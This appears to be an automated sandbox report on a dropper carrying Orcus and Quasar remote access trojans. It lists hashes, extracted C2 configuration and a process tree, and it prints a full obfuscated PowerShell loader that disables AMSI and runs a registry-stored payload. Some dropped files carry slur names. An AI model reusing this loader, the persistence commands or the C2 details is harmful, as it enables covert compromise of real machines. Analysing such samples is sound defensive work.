Analysis

  • max time kernel
    97s
  • max time network
    96s
  • platform
    windows11-21h2_x64
  • resource
    win11-20250411-en
  • resource tags

    arch:x64arch:x86image:win11-20250411-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    19/04/2025, 05:50

General

  • Target

    BootkitBuilded.exe

  • Size

    2.0MB

  • MD5

    99b124439bde7f750accb3a558644341

  • SHA1

    09e26808c12e4d0508a7387b6ff59a745889568e

  • SHA256

    bc3281aba1987ec4b1d4d68e99c8b6829d4fd54477db001bf331971b72789195

  • SHA512

    9c01de8d170de66471aa37ab47bf3817580e152e82879523771a875be114a95b33a33b35d8ab512dea4a68568a8ef635c29f34a33cffb283ed422b4e29562cdf

  • SSDEEP

    49152:PevRj2WXGkpogEPw0GuUUKqCMnFe3FSgEEEbJ:PEZLXz70G0AIKNS

Malware Config

Extracted

Family

orcus

C2

213.209.143.58:2095

Mutex

8a98b570ecf9411bb051e6383f4a23c4

Attributes
  • autostart_method

    Registry

  • enable_keylogger

    false

  • install_path

    %programfiles%\Orcus\Orcus.exe

  • reconnect_delay

    10000

  • registry_keyname

    Orcus

  • taskscheduler_taskname

    Orcus

  • watchdog_path

    AppData\OrcusWatchdog.exe

Extracted

Family

quasar

Attributes
  • encryption_key

    B3E34BC740FE48138878D8FFE23478A44299D77B

  • reconnect_delay

    3000

Signatures

  • Orcus

    Orcus is a Remote Access Trojan that is being sold on underground forums.

  • Orcus family
  • Orcus main payload 1 IoCs
  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar family
  • Quasar payload 2 IoCs
  • Orcurs Rat Executable 3 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 9 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Drops file in System32 directory 3 IoCs
  • Drops file in Program Files directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Time Discovery 1 TTPs 1 IoCs

    Adversary may gather the system time and/or time zone settings from a local or remote system.

  • Checks processor information in registry 2 TTPs 7 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • NTFS ADS 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SendNotifyMessage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:628
    • C:\Windows\system32\dwm.exe
      "dwm.exe"
      2⤵
        PID:412
    • C:\Windows\system32\lsass.exe
      C:\Windows\system32\lsass.exe
      1⤵
      • Suspicious use of WriteProcessMemory
      PID:688
    • C:\Windows\system32\svchost.exe
      C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
      1⤵
        PID:980
      • C:\Windows\System32\svchost.exe
        C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
        1⤵
          PID:536
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
          1⤵
            PID:700
          • C:\Windows\System32\svchost.exe
            C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
            1⤵
              PID:892
            • C:\Windows\system32\svchost.exe
              C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
              1⤵
              • Drops file in System32 directory
              PID:1076
              • C:\Program Files (x86)\Orcus\Orcus.exe
                "C:\Program Files (x86)\Orcus\Orcus.exe"
                2⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                PID:5928
            • C:\Windows\system32\svchost.exe
              C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
              1⤵
                PID:1136
              • C:\Windows\system32\svchost.exe
                C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                1⤵
                  PID:1144
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                  1⤵
                    PID:1260
                  • C:\Windows\System32\svchost.exe
                    C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                    1⤵
                      PID:1288
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                      1⤵
                        PID:1356
                        • C:\Windows\system32\sihost.exe
                          sihost.exe
                          2⤵
                            PID:2320
                        • C:\Windows\System32\svchost.exe
                          C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm
                          1⤵
                            PID:1384
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                            1⤵
                              PID:1404
                            • C:\Windows\System32\svchost.exe
                              C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                              1⤵
                                PID:1420
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                                1⤵
                                  PID:1456
                                • C:\Windows\system32\svchost.exe
                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                  1⤵
                                    PID:1596
                                  • C:\Windows\System32\svchost.exe
                                    C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                    1⤵
                                      PID:1652
                                    • C:\Windows\system32\svchost.exe
                                      C:\Windows\system32\svchost.exe -k NetworkService -p
                                      1⤵
                                        PID:1748
                                      • C:\Windows\System32\svchost.exe
                                        C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                        1⤵
                                          PID:1772
                                        • C:\Windows\system32\svchost.exe
                                          C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                          1⤵
                                            PID:1848
                                          • C:\Windows\System32\svchost.exe
                                            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                            1⤵
                                              PID:1992
                                            • C:\Windows\system32\svchost.exe
                                              C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
                                              1⤵
                                                PID:2000
                                              • C:\Windows\system32\svchost.exe
                                                C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                1⤵
                                                  PID:1916
                                                • C:\Windows\System32\svchost.exe
                                                  C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                  1⤵
                                                    PID:1936
                                                  • C:\Windows\System32\spoolsv.exe
                                                    C:\Windows\System32\spoolsv.exe
                                                    1⤵
                                                      PID:2124
                                                    • C:\Windows\System32\svchost.exe
                                                      C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                      1⤵
                                                        PID:2284
                                                      • C:\Windows\system32\svchost.exe
                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                        1⤵
                                                          PID:2364
                                                        • C:\Windows\system32\svchost.exe
                                                          C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                          1⤵
                                                            PID:2372
                                                          • C:\Windows\system32\svchost.exe
                                                            C:\Windows\system32\svchost.exe -k NetworkService -p
                                                            1⤵
                                                            • Modifies data under HKEY_USERS
                                                            PID:2396
                                                          • C:\Windows\system32\svchost.exe
                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                            1⤵
                                                              PID:2444
                                                            • C:\Windows\sysmon.exe
                                                              C:\Windows\sysmon.exe
                                                              1⤵
                                                                PID:2504
                                                              • C:\Windows\System32\svchost.exe
                                                                C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                1⤵
                                                                  PID:2552
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                                  1⤵
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:2572
                                                                • C:\Windows\System32\svchost.exe
                                                                  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                                  1⤵
                                                                    PID:2580
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                    1⤵
                                                                      PID:2608
                                                                    • C:\Windows\system32\wbem\unsecapp.exe
                                                                      C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                      1⤵
                                                                        PID:2480
                                                                      • C:\Windows\system32\svchost.exe
                                                                        C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                        1⤵
                                                                          PID:1200
                                                                        • C:\Windows\Explorer.EXE
                                                                          C:\Windows\Explorer.EXE
                                                                          1⤵
                                                                          • Suspicious behavior: GetForegroundWindowSpam
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          PID:3320
                                                                          • C:\Users\Admin\AppData\Local\Temp\BootkitBuilded.exe
                                                                            "C:\Users\Admin\AppData\Local\Temp\BootkitBuilded.exe"
                                                                            2⤵
                                                                            • Suspicious use of WriteProcessMemory
                                                                            PID:5360
                                                                            • C:\Users\Admin\AppData\Local\Temp\Install.exe
                                                                              "C:\Users\Admin\AppData\Local\Temp\Install.exe"
                                                                              3⤵
                                                                              • Executes dropped EXE
                                                                              • System Location Discovery: System Language Discovery
                                                                              PID:352
                                                                            • C:\Users\Admin\AppData\Local\Temp\$77nigga.exe
                                                                              "C:\Users\Admin\AppData\Local\Temp\$77nigga.exe"
                                                                              3⤵
                                                                              • Executes dropped EXE
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              • Suspicious use of WriteProcessMemory
                                                                              PID:3424
                                                                              • C:\Windows\SYSTEM32\schtasks.exe
                                                                                "schtasks" /create /tn "notfud" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\notfud\notfud.exe" /rl HIGHEST /f
                                                                                4⤵
                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                PID:4840
                                                                              • C:\Users\Admin\AppData\Roaming\notfud\notfud.exe
                                                                                "C:\Users\Admin\AppData\Roaming\notfud\notfud.exe"
                                                                                4⤵
                                                                                • Executes dropped EXE
                                                                                • Modifies system certificate store
                                                                                • Suspicious behavior: AddClipboardFormatListener
                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                • Suspicious use of WriteProcessMemory
                                                                                PID:4624
                                                                                • C:\Windows\SYSTEM32\schtasks.exe
                                                                                  "schtasks" /create /tn "notfud" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\notfud\notfud.exe" /rl HIGHEST /f
                                                                                  5⤵
                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                  PID:3012
                                                                            • C:\Users\Admin\AppData\Local\Temp\jew.exe
                                                                              "C:\Users\Admin\AppData\Local\Temp\jew.exe"
                                                                              3⤵
                                                                              • Executes dropped EXE
                                                                              • Drops file in Program Files directory
                                                                              • System Location Discovery: System Language Discovery
                                                                              • Suspicious use of WriteProcessMemory
                                                                              PID:764
                                                                              • C:\Program Files (x86)\Orcus\Orcus.exe
                                                                                "C:\Program Files (x86)\Orcus\Orcus.exe"
                                                                                4⤵
                                                                                • Executes dropped EXE
                                                                                • Adds Run key to start application
                                                                                • System Location Discovery: System Language Discovery
                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                • Suspicious use of FindShellTrayWindow
                                                                                • Suspicious use of SendNotifyMessage
                                                                                • Suspicious use of WriteProcessMemory
                                                                                PID:5324
                                                                                • C:\Users\Admin\AppData\Roaming\OrcusWatchdog.exe
                                                                                  "C:\Users\Admin\AppData\Roaming\OrcusWatchdog.exe" /launchSelfAndExit "C:\Program Files (x86)\Orcus\Orcus.exe" 5324 /protectFile
                                                                                  5⤵
                                                                                  • Executes dropped EXE
                                                                                  • System Location Discovery: System Language Discovery
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  • Suspicious use of WriteProcessMemory
                                                                                  PID:464
                                                                                  • C:\Users\Admin\AppData\Roaming\OrcusWatchdog.exe
                                                                                    "C:\Users\Admin\AppData\Roaming\OrcusWatchdog.exe" /watchProcess "C:\Program Files (x86)\Orcus\Orcus.exe" 5324 "/protectFile"
                                                                                    6⤵
                                                                                    • Executes dropped EXE
                                                                                    • System Location Discovery: System Language Discovery
                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    PID:5896
                                                                          • C:\Windows\system32\cmd.exe
                                                                            C:\Windows\system32\cmd.exe /c "C:\Program Files (x86)\Orcus\Orcus.exe"
                                                                            2⤵
                                                                            • Suspicious use of WriteProcessMemory
                                                                            PID:2468
                                                                            • C:\Windows\System32\Conhost.exe
                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              3⤵
                                                                                PID:2760
                                                                              • C:\Program Files (x86)\Orcus\Orcus.exe
                                                                                "C:\Program Files (x86)\Orcus\Orcus.exe"
                                                                                3⤵
                                                                                • Executes dropped EXE
                                                                                • System Location Discovery: System Language Discovery
                                                                                PID:5960
                                                                          • C:\Windows\system32\svchost.exe
                                                                            C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                            1⤵
                                                                              PID:3452
                                                                            • C:\Windows\system32\svchost.exe
                                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
                                                                              1⤵
                                                                                PID:3472
                                                                              • C:\Windows\System32\RuntimeBroker.exe
                                                                                C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                1⤵
                                                                                  PID:3820
                                                                                • C:\Windows\System32\RuntimeBroker.exe
                                                                                  C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                  1⤵
                                                                                    PID:3884
                                                                                  • C:\Windows\system32\DllHost.exe
                                                                                    C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                    1⤵
                                                                                      PID:3952
                                                                                    • C:\Windows\system32\svchost.exe
                                                                                      C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc
                                                                                      1⤵
                                                                                        PID:3988
                                                                                      • C:\Windows\system32\DllHost.exe
                                                                                        C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
                                                                                        1⤵
                                                                                          PID:4240
                                                                                        • C:\Windows\system32\svchost.exe
                                                                                          C:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc
                                                                                          1⤵
                                                                                            PID:4404
                                                                                          • C:\Windows\system32\svchost.exe
                                                                                            C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
                                                                                            1⤵
                                                                                              PID:5384
                                                                                            • C:\Windows\system32\svchost.exe
                                                                                              C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                              1⤵
                                                                                                PID:3700
                                                                                              • C:\Windows\System32\svchost.exe
                                                                                                C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                                1⤵
                                                                                                  PID:5800
                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                                  1⤵
                                                                                                    PID:796
                                                                                                  • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                    "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                    1⤵
                                                                                                      PID:1344
                                                                                                    • C:\Windows\system32\SppExtComObj.exe
                                                                                                      C:\Windows\system32\SppExtComObj.exe -Embedding
                                                                                                      1⤵
                                                                                                        PID:2300
                                                                                                      • C:\Windows\System32\svchost.exe
                                                                                                        C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                                        1⤵
                                                                                                          PID:2536
                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                          1⤵
                                                                                                            PID:2988
                                                                                                          • C:\Windows\system32\DllHost.exe
                                                                                                            C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                            1⤵
                                                                                                              PID:3080
                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                              C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
                                                                                                              1⤵
                                                                                                                PID:4040
                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                cmd.exe /c "powershell.exe -Command ""function Local:dpcsYwqewvhq{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$KsoigGxliGMRiZ,[Parameter(Position=1)][Type]$dbnkzakihP)$SVgmAUkOXNo=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+''+'f'+''+'l'+'e'+'c'+''+[Char](116)+''+[Char](101)+''+'d'+''+'D'+''+[Char](101)+''+[Char](108)+'eg'+[Char](97)+'te')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+[Char](110)+''+[Char](77)+''+'e'+''+'m'+'o'+'r'+''+'y'+''+[Char](77)+''+'o'+''+[Char](100)+''+'u'+''+'l'+'e',$False).DefineType('M'+[Char](121)+''+[Char](68)+''+'e'+''+[Char](108)+''+[Char](101)+''+[Char](103)+'a'+'t'+''+[Char](101)+''+[Char](84)+'y'+[Char](112)+''+[Char](101)+'','C'+'l'+''+'a'+''+'s'+'s,'+[Char](80)+'u'+[Char](98)+'l'+'i'+'c'+','+''+[Char](83)+''+[Char](101)+''+[Char](97)+''+[Char](108)+'e'+[Char](100)+','+[Char](65)+'n'+[Char](115)+''+[Char](105)+''+[Char](67)+''+[Char](108)+''+'a'+'s'+'s'+''+[Char](44)+''+'A'+''+[Char](117)+''+'t'+''+'o'+'C'+'l'+''+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$SVgmAUkOXNo.DefineConstructor(''+[Char](82)+''+'T'+''+[Char](83)+''+[Char](112)+''+[Char](101)+''+[Char](99)+'ia'+'l'+'N'+'a'+''+[Char](109)+''+[Char](101)+''+','+''+'H'+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+'y'+[Char](83)+''+'i'+''+'g'+''+','+''+'P'+''+'u'+''+'b'+'l'+'i'+'c',[Reflection.CallingConventions]::Standard,$KsoigGxliGMRiZ).SetImplementationFlags(''+[Char](82)+''+'u'+'n'+[Char](116)+'i'+[Char](109)+''+[Char](101)+''+[Char](44)+''+'M'+''+[Char](97)+''+'n'+''+'a'+''+'g'+''+[Char](101)+''+[Char](100)+'');$SVgmAUkOXNo.DefineMethod('Invo'+'k'+''+[Char](101)+'',''+'P'+'ub'+[Char](108)+''+'i'+'c'+[Char](44)+'Hi'+[Char](100)+''+[Char](101)+''+'B'+'yS'+[Char](105)+''+[Char](103)+''+','+''+[Char](78)+''+[Char](101)+''+[Char](119)+''+'S'+'l'+[Char](111)+''+'t'+''+[Char](44)+'V'+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+'l'+'',$dbnkzakihP,$KsoigGxliGMRiZ).SetImplementationFlags('R'+[Char](117)+''+'n'+'t'+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+'M'+[Char](97)+'n'+'a'+'g'+'e'+''+[Char](100)+'');Write-Output $SVgmAUkOXNo.CreateType();}$lXgssjUwdnDdn=([AppDomain]::CurrentDomain.GetAssemblies()^|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+'s'+'t'+''+[Char](101)+''+[Char](109)+''+[Char](46)+''+'d'+''+[Char](108)+''+'l'+'')}).GetType(''+[Char](77)+''+[Char](105)+''+'c'+''+'r'+''+[Char](111)+''+'s'+''+[Char](111)+''+'f'+''+[Char](116)+''+'.'+'W'+[Char](105)+''+[Char](110)+'3'+'2'+''+'.'+'U'+[Char](110)+''+[Char](115)+'a'+[Char](102)+''+'e'+''+[Char](78)+''+'a'+'t'+[Char](105)+''+[Char](118)+''+'e'+''+[Char](77)+''+'e'+''+[Char](116)+''+'h'+''+[Char](111)+'d'+[Char](115)+'');$WgxfxABIVVNppy=$lXgssjUwdnDdn.GetMethod(''+[Char](71)+''+'e'+'tP'+[Char](114)+''+[Char](111)+'c'+[Char](65)+''+'d'+''+'d'+''+[Char](114)+''+[Char](101)+''+[Char](115)+'s',[Reflection.BindingFlags](''+'P'+''+'u'+''+'b'+'l'+[Char](105)+'c'+','+''+[Char](83)+''+[Char](116)+'ati'+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$HqXSNFMCLrkDcZSBENe=dpcsYwqewvhq @([String])([IntPtr]);$XBdxjitDqIdPBOBdCbAMnS=dpcsYwqewvhq @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$lnGkqgDuMie=$lXgssjUwdnDdn.GetMethod('Ge'+'t'+''+[Char](77)+''+[Char](111)+''+'d'+''+'u'+''+'l'+''+'e'+''+[Char](72)+''+[Char](97)+''+'n'+''+[Char](100)+''+'l'+''+[Char](101)+'').Invoke($Null,@([Object](''+'k'+''+'e'+''+[Char](114)+''+'n'+''+[Char](101)+''+[Char](108)+''+[Char](51)+''+[Char](50)+''+[Char](46)+'d'+[Char](108)+''+'l'+'')));$LnUUezLhWWpZzn=$WgxfxABIVVNppy.Invoke($Null,@([Object]$lnGkqgDuMie,[Object]('L'+'o'+''+[Char](97)+''+[Char](100)+''+[Char](76)+''+[Char](105)+''+[Char](98)+''+[Char](114)+''+[Char](97)+'r'+'y'+'A')));$DbcLeGziDLBdtAYlH=$WgxfxABIVVNppy.Invoke($Null,@([Object]$lnGkqgDuMie,[Object](''+[Char](86)+''+'i'+''+'r'+''+[Char](116)+''+'u'+'a'+[Char](108)+'P'+'r'+''+[Char](111)+'t'+[Char](101)+''+'c'+'t')));$xmDyuPI=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LnUUezLhWWpZzn,$HqXSNFMCLrkDcZSBENe).Invoke('a'+[Char](109)+'s'+'i'+'.'+[Char](100)+''+'l'+'l');$JBVuTDQlAXQFioRcL=$WgxfxABIVVNppy.Invoke($Null,@([Object]$xmDyuPI,[Object](''+'A'+'ms'+[Char](105)+''+[Char](83)+''+[Char](99)+''+'a'+''+[Char](110)+''+[Char](66)+''+[Char](117)+''+[Char](102)+''+[Char](102)+''+[Char](101)+''+[Char](114)+'')));$vXklaNIAlL=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($DbcLeGziDLBdtAYlH,$XBdxjitDqIdPBOBdCbAMnS).Invoke($JBVuTDQlAXQFioRcL,[uint32]8,4,[ref]$vXklaNIAlL);[Runtime.InteropServices.Marshal]::Copy([Byte[]]([Byte](30+101),[Byte](47+187),[Byte](127-127),[Byte](84+100),[Byte](132-45),[Byte](165-165),[Byte](11-4),[Byte](184-56),[Byte](97+34),[Byte](219-27),[Byte](15-15),[Byte](155+40),[Byte](84+53),[Byte](177+33)),0,$JBVuTDQlAXQFioRcL,111-97);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($DbcLeGziDLBdtAYlH,$XBdxjitDqIdPBOBdCbAMnS).Invoke($JBVuTDQlAXQFioRcL,[uint32]8,0x20,[ref]$vXklaNIAlL);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+''+[Char](84)+'W'+[Char](65)+''+[Char](82)+''+'E'+'').GetValue('$'+'7'+'7'+'s'+''+[Char](116)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"""
                                                                                                                1⤵
                                                                                                                • System Time Discovery
                                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                                PID:5388
                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  powershell.exe -Command ""function Local:dpcsYwqewvhq{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$KsoigGxliGMRiZ,[Parameter(Position=1)][Type]$dbnkzakihP)$SVgmAUkOXNo=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+''+'f'+''+'l'+'e'+'c'+''+[Char](116)+''+[Char](101)+''+'d'+''+'D'+''+[Char](101)+''+[Char](108)+'eg'+[Char](97)+'te')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+[Char](110)+''+[Char](77)+''+'e'+''+'m'+'o'+'r'+''+'y'+''+[Char](77)+''+'o'+''+[Char](100)+''+'u'+''+'l'+'e',$False).DefineType('M'+[Char](121)+''+[Char](68)+''+'e'+''+[Char](108)+''+[Char](101)+''+[Char](103)+'a'+'t'+''+[Char](101)+''+[Char](84)+'y'+[Char](112)+''+[Char](101)+'','C'+'l'+''+'a'+''+'s'+'s,'+[Char](80)+'u'+[Char](98)+'l'+'i'+'c'+','+''+[Char](83)+''+[Char](101)+''+[Char](97)+''+[Char](108)+'e'+[Char](100)+','+[Char](65)+'n'+[Char](115)+''+[Char](105)+''+[Char](67)+''+[Char](108)+''+'a'+'s'+'s'+''+[Char](44)+''+'A'+''+[Char](117)+''+'t'+''+'o'+'C'+'l'+''+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$SVgmAUkOXNo.DefineConstructor(''+[Char](82)+''+'T'+''+[Char](83)+''+[Char](112)+''+[Char](101)+''+[Char](99)+'ia'+'l'+'N'+'a'+''+[Char](109)+''+[Char](101)+''+','+''+'H'+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+'y'+[Char](83)+''+'i'+''+'g'+''+','+''+'P'+''+'u'+''+'b'+'l'+'i'+'c',[Reflection.CallingConventions]::Standard,$KsoigGxliGMRiZ).SetImplementationFlags(''+[Char](82)+''+'u'+'n'+[Char](116)+'i'+[Char](109)+''+[Char](101)+''+[Char](44)+''+'M'+''+[Char](97)+''+'n'+''+'a'+''+'g'+''+[Char](101)+''+[Char](100)+'');$SVgmAUkOXNo.DefineMethod('Invo'+'k'+''+[Char](101)+'',''+'P'+'ub'+[Char](108)+''+'i'+'c'+[Char](44)+'Hi'+[Char](100)+''+[Char](101)+''+'B'+'yS'+[Char](105)+''+[Char](103)+''+','+''+[Char](78)+''+[Char](101)+''+[Char](119)+''+'S'+'l'+[Char](111)+''+'t'+''+[Char](44)+'V'+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+'l'+'',$dbnkzakihP,$KsoigGxliGMRiZ).SetImplementationFlags('R'+[Char](117)+''+'n'+'t'+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+'M'+[Char](97)+'n'+'a'+'g'+'e'+''+[Char](100)+'');Write-Output $SVgmAUkOXNo.CreateType();}$lXgssjUwdnDdn=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+'s'+'t'+''+[Char](101)+''+[Char](109)+''+[Char](46)+''+'d'+''+[Char](108)+''+'l'+'')}).GetType(''+[Char](77)+''+[Char](105)+''+'c'+''+'r'+''+[Char](111)+''+'s'+''+[Char](111)+''+'f'+''+[Char](116)+''+'.'+'W'+[Char](105)+''+[Char](110)+'3'+'2'+''+'.'+'U'+[Char](110)+''+[Char](115)+'a'+[Char](102)+''+'e'+''+[Char](78)+''+'a'+'t'+[Char](105)+''+[Char](118)+''+'e'+''+[Char](77)+''+'e'+''+[Char](116)+''+'h'+''+[Char](111)+'d'+[Char](115)+'');$WgxfxABIVVNppy=$lXgssjUwdnDdn.GetMethod(''+[Char](71)+''+'e'+'tP'+[Char](114)+''+[Char](111)+'c'+[Char](65)+''+'d'+''+'d'+''+[Char](114)+''+[Char](101)+''+[Char](115)+'s',[Reflection.BindingFlags](''+'P'+''+'u'+''+'b'+'l'+[Char](105)+'c'+','+''+[Char](83)+''+[Char](116)+'ati'+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$HqXSNFMCLrkDcZSBENe=dpcsYwqewvhq @([String])([IntPtr]);$XBdxjitDqIdPBOBdCbAMnS=dpcsYwqewvhq 